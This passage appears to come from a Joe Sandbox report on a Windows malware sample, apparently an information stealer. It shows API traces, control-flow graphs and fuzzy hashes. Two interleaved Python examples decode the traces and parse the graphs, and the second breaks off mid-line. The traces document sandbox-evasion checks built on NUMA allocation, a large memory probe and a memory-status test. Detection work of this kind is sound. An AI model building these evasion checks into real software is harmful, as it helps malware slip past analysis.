                          • GetProcAddress.KERNEL32(6F070000,01245E10), ref: 007F709C
                          • GetProcAddress.KERNEL32(6F070000,01245E30), ref: 007F70B4
                          • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 007F70CB
                          • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 007F70E2
                          • GetProcAddress.KERNEL32(75AF0000,0125D340), ref: 007F70FE
                          • GetProcAddress.KERNEL32(75AF0000,01258FF8), ref: 007F7116
                          • GetProcAddress.KERNEL32(75AF0000,0125D3E8), ref: 007F712F
                          • GetProcAddress.KERNEL32(75AF0000,0125D2C8), ref: 007F7147
                          • GetProcAddress.KERNEL32(75D90000,01245E50), ref: 007F7163
                          • GetProcAddress.KERNEL32(6E440000,0125D2B0), ref: 007F717F
                          • GetProcAddress.KERNEL32(6E440000,01245B30), ref: 007F7197
                          • GetProcAddress.KERNEL32(6E440000,0125D358), ref: 007F71B0
                          • GetProcAddress.KERNEL32(6E440000,0125D2E0), ref: 007F71C8
                          Strings
                          Memory Dump Source
                           • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                           • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                          • API String ID: 2238633743-3468015613
                          • Opcode ID: e2408d6c85ea102479abc7caba2cabf46d48e1b79d44578d10f071493ed6320d
                          • Instruction ID: 7dd571912541d157e548ebee82a0cddb543bd145b5e4eb337341c96a9a489d85
                          • Opcode Fuzzy Hash: e2408d6c85ea102479abc7caba2cabf46d48e1b79d44578d10f071493ed6320d
                          • Instruction Fuzzy Hash: 006271B56112099FD754DFE4EC98A2737BAF7883413008919E996C3376DB78A843DF28
                          APIs
                          • lstrlen.KERNEL32(007FCFEC), ref: 007EF1D5
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EF1F1
                          • lstrlen.KERNEL32(007FCFEC), ref: 007EF1FC
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EF215
                          • lstrlen.KERNEL32(007FCFEC), ref: 007EF220
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EF239
                          • lstrcpy.KERNEL32(00000000,00804FA0), ref: 007EF25E
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EF28C
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EF2C0
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EF2F0
                          • lstrlen.KERNEL32(01245910), ref: 007EF315
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 444a874783de82e8ff214757f998f93cd5d6d816275b3d6b75e96bbd73b2c873
                          • Instruction ID: bc3328d9fd4823341d17d41ad340a1f4fa8069dce9cd627e0419d8480011150a
                          • Opcode Fuzzy Hash: 444a874783de82e8ff214757f998f93cd5d6d816275b3d6b75e96bbd73b2c873
                          • Instruction Fuzzy Hash: 43A26370A02246CFDB20DF66D948A5AB7F4AF48314F18857AE849DB762DB39DC43CB50
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F0013
                          • lstrlen.KERNEL32(007FCFEC), ref: 007F00BD
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F00E1
                          • lstrlen.KERNEL32(007FCFEC), ref: 007F00EC
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F0110
                          • lstrlen.KERNEL32(007FCFEC), ref: 007F011B
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F013F
                          • lstrlen.KERNEL32(007FCFEC), ref: 007F015A
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F0189
                          • lstrlen.KERNEL32(007FCFEC), ref: 007F0194
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F01C3
                          • lstrlen.KERNEL32(007FCFEC), ref: 007F01CE
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F0206
                          • lstrlen.KERNEL32(007FCFEC), ref: 007F0250
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F0288
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F059B
                          • lstrlen.KERNEL32(01245A10), ref: 007F05AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F05D7
                          • lstrcat.KERNEL32(00000000,?), ref: 007F05E3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F060E
                          • lstrlen.KERNEL32(0125E550), ref: 007F0625
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F064C
                          • lstrcat.KERNEL32(00000000,?), ref: 007F0658
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F0681
                          • lstrlen.KERNEL32(012459B0), ref: 007F0698
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F06C9
                          • lstrcat.KERNEL32(00000000,?), ref: 007F06D5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F0706
                          • lstrcpy.KERNEL32(00000000,01258F68), ref: 007F074B
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1557
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1579
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D159B
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D15FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F077F
                          • lstrcpy.KERNEL32(00000000,0125E3B8), ref: 007F07E7
                          • lstrcpy.KERNEL32(00000000,01259148), ref: 007F0858
                          • lstrcpy.KERNEL32(00000000,fplugins), ref: 007F08CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F0928
                          • lstrcpy.KERNEL32(00000000,01259298), ref: 007F09F8
                            • Part of subcall function 007D24E0: lstrcpy.KERNEL32(00000000,?), ref: 007D2528
                            • Part of subcall function 007D24E0: lstrcpy.KERNEL32(00000000,?), ref: 007D254E
                            • Part of subcall function 007D24E0: lstrcpy.KERNEL32(00000000,?), ref: 007D2577
                          • lstrcpy.KERNEL32(00000000,012591C8), ref: 007F0ACE
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F0B81
                          • lstrcpy.KERNEL32(00000000,012591C8), ref: 007F0D58
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID: fplugins
                          • API String ID: 2500673778-38756186
                          • Opcode ID: 9685b3ad9971a85f39c682d510a9f23497f1ff8e5e31d7078d59728b48f31cb7
                          • Instruction ID: ae12c909e126d27c89d79c84f49774c832c6134e0e423eb30a21c2ebab57e07c
                          • Opcode Fuzzy Hash: 9685b3ad9971a85f39c682d510a9f23497f1ff8e5e31d7078d59728b48f31cb7
                          • Instruction Fuzzy Hash: 70E24A70A05345CFD724DF69C488B6AB7F0BF88314F58856ED58D8B362DB399842CB92

                           Control-flow Graph: function at 7d6c40 (basic blocks 7d6c40 through 7d6ee0; executed and not-executed blocks are colour-coded in the original graph image, which is not reproduced here). API calls seen in the graph: lstrcpy, InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile, InternetCloseHandle; subcalls to 7d2930, 7d4bc0, 7d2a20, 7f71e0, 7f3d90 and 7f7310.
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D6C6F
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D6CC2
                          • InternetOpenA.WININET(007FCFEC,00000001,00000000,00000000,00000000), ref: 007D6CD5
                          • StrCmpCA.SHLWAPI(?,0125EB38), ref: 007D6CED
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007D6D15
                          • HttpOpenRequestA.WININET(00000000,GET,?,0125E328,00000000,00000000,-00400100,00000000), ref: 007D6D50
                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 007D6D77
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007D6D86
                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 007D6DA5
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007D6DFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D6E5B
                          • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 007D6E7D
                          • InternetCloseHandle.WININET(00000000), ref: 007D6E8E
                          • InternetCloseHandle.WININET(?), ref: 007D6E98
                          • InternetCloseHandle.WININET(00000000), ref: 007D6EA2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D6EC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                          • String ID: ERROR$GET
                          • API String ID: 3687753495-3591763792
                          • Opcode ID: a5a36e6262c9a8d1bedcf397706fd8b645d648b011038c9ece0ca8c4ed7170f7
                          • Instruction ID: 6542a6e26056e8faa3e40dff90a348897c662c5b654c0e3f0fb7a628e438b00b
                          • Opcode Fuzzy Hash: a5a36e6262c9a8d1bedcf397706fd8b645d648b011038c9ece0ca8c4ed7170f7
                          • Instruction Fuzzy Hash: 3781A171A51219ABEB20DFA4DC49FAF77B8EF44700F044169F945E7381DB78AD068BA0
                          APIs
                          • lstrlen.KERNEL32(01245910), ref: 007EF315
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EF3A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EF3C7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EF47B
                          • lstrcpy.KERNEL32(00000000,01245910), ref: 007EF4BB
                          • lstrcpy.KERNEL32(00000000,01259058), ref: 007EF4EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EF59E
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007EF61C
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EF64C
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EF69A
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 007EF718
                          • lstrlen.KERNEL32(01258F38), ref: 007EF746
                          • lstrcpy.KERNEL32(00000000,01258F38), ref: 007EF771
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EF793
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EF7E4
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 007EFA32
                          • lstrlen.KERNEL32(01258F48), ref: 007EFA60
                          • lstrcpy.KERNEL32(00000000,01258F48), ref: 007EFA8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EFAAD
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EFAFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 5cdecfdcb27484cc4e45a17b55e1fc612578afe9bb0c4c0200efa314510467f2
                          • Instruction ID: d0fb602d524bea1ab58397e8a0c6ca408d28308056d050c9d6a753e141c7e0ec
                          • Opcode Fuzzy Hash: 5cdecfdcb27484cc4e45a17b55e1fc612578afe9bb0c4c0200efa314510467f2
                          • Instruction Fuzzy Hash: 32F12C70A02246CFDB64DF6AC858A16B7F5BF48314B19C1BAD4099B7A2E739DC43CB50

                           Control-flow Graph: function at 7e8ca0 (basic blocks 7e8ca0 through 7e8eef; executed and not-executed blocks are colour-coded in the original graph image, which is not reproduced here). API calls seen in the graph: StrCmpCA (repeated comparisons), ExitProcess, lstrlen, lstrcpy; subcalls to 7d2a20 and 7d2930.
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 42cd323f72d36f2163e7481a5c8198d89d2dd35b1fe88f30324908b6fe383007
                          • Instruction ID: 98311c023b46f69e6717b1dca8aec10161c08d01d1841d7625614b7c7ab53468
                          • Opcode Fuzzy Hash: 42cd323f72d36f2163e7481a5c8198d89d2dd35b1fe88f30324908b6fe383007
                          • Instruction Fuzzy Hash: D8519FB0A05785DBD7A0DFB6DC88A2B77F4FB58700B10481DE58AD2661DB7CE4439B22

                          Control-flow Graph

                          control_flow_graph 2782 7f2740-7f2783 GetWindowsDirectoryA 2783 7f278c-7f27ea GetVolumeInformationA 2782->2783 2784 7f2785 2782->2784 2785 7f27ec-7f27f2 2783->2785 2784->2783 2786 7f2809-7f2820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 7f27f4-7f2807 2785->2787 2788 7f2826-7f2844 wsprintfA 2786->2788 2789 7f2822-7f2824 2786->2789 2787->2785 2790 7f285b-7f2872 call 7f71e0 2788->2790 2789->2790
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 007F277B
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,007E93B6,00000000,00000000,00000000,00000000), ref: 007F27AC
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F280F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F2816
                          • wsprintfA.USER32 ref: 007F283B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                          • String ID: :\$C
                          • API String ID: 2572753744-3309953409
                          • Opcode ID: ce1ba069c881c7d6e3d1d1b041ed7efac219923de9526c166cd966f6ff3029c5
                          • Instruction ID: 061a1deb564efdf6058c249832bf3d9afa1f27fc5a0f72abba38ef99c6ef1fd8
                          • Opcode Fuzzy Hash: ce1ba069c881c7d6e3d1d1b041ed7efac219923de9526c166cd966f6ff3029c5
                          • Instruction Fuzzy Hash: F33192B1D0820D9BCB04CFF889859EFBFBCEF58750F104169E605F7651E2348A418BA5

                          Control-flow Graph

                          control_flow_graph 2793 7d4bc0-7d4bce 2794 7d4bd0-7d4bd5 2793->2794 2794->2794 2795 7d4bd7-7d4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 7d2a20 2794->2795
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 007D4BF7
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007D4C01
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007D4C0B
                          • lstrlen.KERNEL32(?,00000000,?), ref: 007D4C1F
                          • InternetCrackUrlA.WININET(?,00000000), ref: 007D4C27
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ??2@$CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1683549937-4251816714
                          • Opcode ID: f8510881fc84f41369415c2027d9d9d87837f4a901ff845e15be841d1621a1dc
                          • Instruction ID: 94826ee63db62e9e204e0a814b72d98dcc4d0e980ba1a1a44e7a871212e8a739
                          • Opcode Fuzzy Hash: f8510881fc84f41369415c2027d9d9d87837f4a901ff845e15be841d1621a1dc
                          • Instruction Fuzzy Hash: BF012D71D00218ABDB10DFA8EC45B9EBBB8EB58320F008126F955E7390DB7459058FD4

                          Control-flow Graph

                          control_flow_graph 2798 7d1030-7d1055 GetCurrentProcess VirtualAllocExNuma 2799 7d105e-7d107b VirtualAlloc 2798->2799 2800 7d1057-7d1058 ExitProcess 2798->2800 2801 7d107d-7d1080 2799->2801 2802 7d1082-7d1088 2799->2802 2801->2802 2803 7d108a-7d10ab VirtualFree 2802->2803 2804 7d10b1-7d10b6 2802->2804 2803->2804
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007D1046
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 007D104D
                          • ExitProcess.KERNEL32 ref: 007D1058
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007D106C
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 007D10AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                          • String ID:
                          • API String ID: 3477276466-0
                          • Opcode ID: 0e67b9f99da2135139ded0cf45e55beebd0943bad9509a5ee898db71a24fdd7d
                          • Instruction ID: 1e0872dd7c188531e4ab68dd0e7fe2d53eda54e128d94dcf8ac899b596a66d19
                          • Opcode Fuzzy Hash: 0e67b9f99da2135139ded0cf45e55beebd0943bad9509a5ee898db71a24fdd7d
                          • Instruction Fuzzy Hash: D001F4717802087BF7209AB56C1AF6B7BADE784B01F208015F748E73C0DAB5E9028664
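The "APIs" listing above records the raw stack arguments at each call site, which is awkward to read by hand: 0x3000 is MEM_COMMIT|MEM_RESERVE, 0x40 is PAGE_EXECUTE_READWRITE, and 0x17C841C0 is exactly 399,000,000 bytes (about 380 MiB). The values shown on the GetCurrentProcess line are consistent with the arguments already pushed for the VirtualAllocExNuma call that follows it (size 0x7D0, node 0), since GetCurrentProcess itself takes none. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses lines in the report's own format, expands the MEM_*/PAGE_* constants, and flags the two allocation-based sandbox probes this function exhibits (VirtualAllocExNuma with ExitProcess on the failure path, and a very large VirtualAlloc released again straight away). The five trace lines are copied from this entry as constructed input; the 256 MiB threshold and the pattern names are the example's own assumptions.

```python
"""Decode Joe Sandbox 'APIs' lines and flag allocation-based sandbox probes.
Added example; the trace below is copied from the 0x7D1030 entry (constructed input)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple, Union

Arg = Union[int, str]

# Documented Win32 allocation-type and page-protection constants.
MEM_FLAGS: Dict[int, str] = {
    0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE",
    0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE",
}
PAGE_FLAGS: Dict[int, str] = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
    0x100: "PAGE_GUARD",
}

# Constructed sample: the five API lines the report lists for 0x7D1030.
SAMPLE_TRACE = """\
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007D1046
VirtualAllocExNuma.KERNEL32(00000000), ref: 007D104D
ExitProcess.KERNEL32 ref: 007D1058
VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007D106C
VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 007D10AB
"""

# "<api>.<module>(<args>), ref: <hex>"  or  "<api>.<module> ref: <hex>"
LINE_RE = re.compile(
    r"^[\s•]*(?P<api>[\w@?]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX8 = re.compile(r"[0-9A-Fa-f]{8}")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int  # call-site address


def parse_trace(text: str) -> List[ApiCall]:
    """Parse report lines into ApiCall records; lines that do not match are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args: List[Arg] = []
        for tok in (t.strip() for t in (m.group("args") or "").split(",")):
            if not tok:
                continue
            # Joe Sandbox prints numeric arguments as 8 hex digits; '?' and strings stay raw.
            args.append(int(tok, 16) if HEX8.fullmatch(tok) else tok)
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls


def decode_flags(value: int, table: Dict[int, str]) -> str:
    """Expand a bitmask into its named bits; unknown bits are kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) or "0"


def describe_alloc(call: ApiCall) -> str:
    """Readable form of a VirtualAlloc/VirtualFree call: size, type and protection."""
    size, kind = call.args[1], call.args[2]
    if not isinstance(size, int) or not isinstance(kind, int):
        return f"{call.api} @{call.ref:08X}: non-numeric arguments {call.args}"
    text = (f"{call.api} @{call.ref:08X}: size={size} bytes ({size / 2**20:.1f} MiB), "
            f"type={decode_flags(kind, MEM_FLAGS)}")
    if call.api == "VirtualAlloc" and len(call.args) > 3 and isinstance(call.args[3], int):
        text += f", protect={decode_flags(call.args[3], PAGE_FLAGS)}"
    return text


def find_alloc_probes(calls: List[ApiCall],
                      big_alloc: int = 256 * 2**20) -> List[Tuple[str, int]]:
    """Flag two evasion idioms (pattern names and the 256 MiB threshold are assumptions):
    - VirtualAllocExNuma immediately followed by ExitProcess: the failure path of a
      NUMA allocation is used to bail out of environments that do not support it;
    - a large VirtualAlloc whose exact size is later passed to VirtualFree(MEM_RELEASE):
      a memory-capacity probe that fails on minimally provisioned sandboxes."""
    findings: List[Tuple[str, int]] = []
    for i, c in enumerate(calls):
        nxt = calls[i + 1] if i + 1 < len(calls) else None
        if c.api == "VirtualAllocExNuma" and nxt is not None and nxt.api == "ExitProcess":
            findings.append(("numa_alloc_gate", c.ref))
        if c.api == "VirtualAlloc" and len(c.args) > 1 and isinstance(c.args[1], int):
            size = c.args[1]
            released = any(
                d.api == "VirtualFree" and len(d.args) > 2
                and d.args[1] == size and isinstance(d.args[2], int) and d.args[2] & 0x8000
                for d in calls[i + 1:]
            )
            if size >= big_alloc and released:
                findings.append(("large_alloc_probe", c.ref))
    return findings


if __name__ == "__main__":
    trace = parse_trace(SAMPLE_TRACE)
    for call in trace:
        if call.api in ("VirtualAlloc", "VirtualFree"):
            print(describe_alloc(call))
    for name, ref in find_alloc_probes(trace):
        print(f"{name} at {ref:08X}")
```

Run on this entry it reports the 399,000,000-byte VirtualAlloc as MEM_COMMIT|MEM_RESERVE / PAGE_READWRITE, its matching VirtualFree with MEM_RELEASE, and both probes (numa_alloc_gate at 007D104D, large_alloc_probe at 007D106C). The numeric threshold the sample compares against is not visible in the API trace, so the example only flags the shape of the sequence.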

                          Control-flow Graph

                          control_flow_graph 2805 7eee90-7eeeb5 call 7d2930 2808 7eeec9-7eeecd call 7d6c40 2805->2808 2809 7eeeb7-7eeebf 2805->2809 2812 7eeed2-7eeee8 StrCmpCA 2808->2812 2809->2808 2810 7eeec1-7eeec3 lstrcpy 2809->2810 2810->2808 2813 7eeeea-7eef02 call 7d2a20 call 7d2930 2812->2813 2814 7eef11-7eef18 call 7d2a20 2812->2814 2823 7eef04-7eef0c 2813->2823 2824 7eef45-7eefa0 call 7d2a20 * 10 2813->2824 2819 7eef20-7eef28 2814->2819 2819->2819 2821 7eef2a-7eef37 call 7d2930 2819->2821 2821->2824 2830 7eef39 2821->2830 2823->2824 2826 7eef0e-7eef0f 2823->2826 2829 7eef3e-7eef3f lstrcpy 2826->2829 2829->2824 2830->2829
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EEEC3
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 007EEEDE
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 007EEF3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: ERROR
                          • API String ID: 3722407311-2861137601
                          • Opcode ID: 9d5698f6e2c905b742af9eaba3c0c3d1031819af6e33c9cb3677875771a4193f
                          • Instruction ID: e0b32a03d15f1243462570d0fbfed52d89b1a6b10ce5f0caecb3bf31ef6f039e
                          • Opcode Fuzzy Hash: 9d5698f6e2c905b742af9eaba3c0c3d1031819af6e33c9cb3677875771a4193f
                          • Instruction Fuzzy Hash: 4B21F170621255DBCB61FF79DC49B9A37B4EF64300F04A425B84AEB353DA38E8078790

                          Control-flow Graph

                          control_flow_graph 2886 7d10c0-7d10cb 2887 7d10d0-7d10dc 2886->2887 2889 7d10de-7d10f3 GlobalMemoryStatusEx 2887->2889 2890 7d10f5-7d1106 2889->2890 2891 7d1112-7d1114 ExitProcess 2889->2891 2892 7d1108 2890->2892 2893 7d111a-7d111d 2890->2893 2892->2891 2894 7d110a-7d1110 2892->2894 2894->2891 2894->2893
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: 3acbde0234d23288ed80c06c9dccbede04ce403d699eda702e3fa32979cd1958
                          • Instruction ID: 38135a6e2149afcca30a0b0aed90eefa5d459995fa1a304d6f97d78058966345
                          • Opcode Fuzzy Hash: 3acbde0234d23288ed80c06c9dccbede04ce403d699eda702e3fa32979cd1958
                          • Instruction Fuzzy Hash: 73F0AE7011424D67E714BAA4D84571EF7F8E701350F94452BDED6C2392F679C8819177
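Each "control_flow_graph" line in this report is the text serialisation of the rendered graph: a node id, its address range (or a single address), the API names the block calls, and id->id edges. For anti-analysis functions the useful question is which check decides the ExitProcess. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that parses this format and, for every block calling ExitProcess, walks predecessors back to the nearest block that calls a Win32 API. The two graphs it embeds are copied verbatim from the 0x7D1030 entry and from this one (0x7D10C0) as constructed input; the traversal, and the assumption that blocks without API labels are pure branching logic to be walked through, are the example's own.

```python
"""Parse Joe Sandbox 'control_flow_graph' text and find the API checks that gate
every ExitProcess. Added example; the two graphs are copied from the report."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

# Constructed sample inputs: the graph lines for 0x7D1030 and 0x7D10C0, verbatim.
CFG_7D1030 = ("control_flow_graph 2798 7d1030-7d1055 GetCurrentProcess VirtualAllocExNuma "
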